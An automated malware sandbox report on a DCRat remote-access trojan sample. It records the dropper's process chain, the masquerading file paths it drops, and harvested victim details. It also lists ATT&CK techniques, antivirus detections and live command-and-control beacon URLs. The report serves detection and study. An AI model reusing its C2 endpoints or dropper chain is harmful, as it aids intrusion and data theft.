Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D7866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D7866F
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D6EF05

Source: C:\bridgeportserver\blockServerruntime.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"	Jump to behavior

Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}H;
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sle
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}Pp
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"648351","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}Pp

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D6ED5B cpuid

0_2_00D6ED5B

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00D6A63C

Source: C:\bridgeportserver\blockServerruntime.exe	Queries volume information: C:\bridgeportserver\blockServerruntime.exe VolumeInformation	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Queries volume information: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Queries volume information: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Queries volume information: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe VolumeInformation
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D6D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00D6D5D4

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D5ACF5 GetVersionExW,

0_2_00D5ACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: blockServerruntime.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7628, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: blockServerruntime.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qVUjshNEHYUOCXyHyUMQwFlZoe.exe PID: 7628, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	23 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	Login Hook	12 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	137 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N0tepkRPzw.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
N0tepkRPzw.exe	59%	Virustotal		Browse
N0tepkRPzw.exe	100%	Avira	VBS/Runner.VPG
N0tepkRPzw.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\bridgeportserver\u0vIoi.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\bridgeportserver\blockServerruntime.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Avira	HEUR/AGEN.1323984
C:\Windows\addins\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\bridgeportserver\blockServerruntime.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	100%	Joe Sandbox ML
C:\Windows\addins\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\WindowsPowerShell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\ProgramData\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	68%	Virustotal		Browse
C:\Windows\addins\RuntimeBroker.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Windows\addins\RuntimeBroker.exe	68%	Virustotal		Browse
C:\bridgeportserver\blockServerruntime.exe	88%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\bridgeportserver\blockServerruntime.exe	68%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
a0985701.xsph.ru	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://a0985701.xsph.ru/	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/	11%	Virustotal		Browse
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru	100%	Avira URL Cloud	malware
http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbU